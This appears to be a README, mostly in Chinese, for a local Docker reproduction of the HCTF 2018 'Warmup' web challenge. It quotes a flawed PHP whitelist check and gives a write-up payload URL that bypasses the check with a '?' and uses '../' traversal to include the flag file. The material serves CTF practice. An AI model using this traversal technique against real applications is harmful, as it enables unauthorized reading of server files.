HCTF 2018 Warmup

题目详情

HCTF 2018 Web 签到题

考点

代码审计

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

启动

docker-compose up -d
open http://127.0.0.1:8081/index.php

Writeup

http://127.0.0.1:8081/index.php?file=hint.php?/../../../../../../../../ffffllllaaaagggg 可以利用?截取hint.php，然后利用/使hint.php?成为一个不存在的目录，最后include利用../../跳转目录读取flag

版权

该题目复现环境尚未取得主办方及出题人相关授权，如果侵权，请联系本人删除（ cocolizdf@gmail.com）

凭印象弄的,稍微有一些改变,题目考点不变. 官方题目代码https://github.com/vidar-team/HCTF2018

About

hctf_2018_warmup

Languages

Language:PHP 82.6%Language:Dockerfile 14.2%Language:Shell 3.1%